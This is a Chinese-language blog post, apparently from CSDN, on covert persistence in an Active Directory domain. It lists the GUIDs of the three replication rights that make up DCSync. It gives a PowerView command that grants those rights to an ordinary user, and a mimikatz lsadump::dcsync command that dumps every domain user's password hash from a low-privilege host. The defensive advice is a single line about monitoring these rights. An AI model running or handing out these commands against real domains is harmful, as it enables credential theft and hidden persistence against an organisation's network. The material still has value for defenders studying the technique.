赋予域内普通用户dcsync权限来变向权限维持

前言

DCsync是几个权限的集合体,如果普通用户想具有DCsync权限,可以给对象添加以下三条ACE:

DS-Replication-Get-Changes,对应GUID为:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2

DS-Replication-Get-Changes-All,对应GUID为:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2

DS-Replication-Get-Changes-In-Filtered-Set,对应GUID为:89e95b76-444d-4c62-991a-0facbeda640c

利用过程

powerview

Set-ExecutionPolicy Bypass -Scope Process
. .\PowerView.ps1
Add-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity zhangsan -Rights DCSync -Verbose

使用mimikatz在低权限主机上读取域内其他用户的密码

privilege::Debug #可以不用这一句
lsadump::dcsync /all /csv

结果如下,在低权限的zhangsan主机上可以使用mimikatz读取域内所有用户的hash:
在这里插入图片描述

删除账号dcsync权限:

Remove-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity zhangsan -Rights DCSync -Verbose

防御方法

监控前面讲述的几个权限的分配情况。

  • 3
    点赞
  • 2
    收藏
  • 打赏
    打赏
  • 7
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:程序猿惹谁了 设计师:我叫白小胖 返回首页
评论 7

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值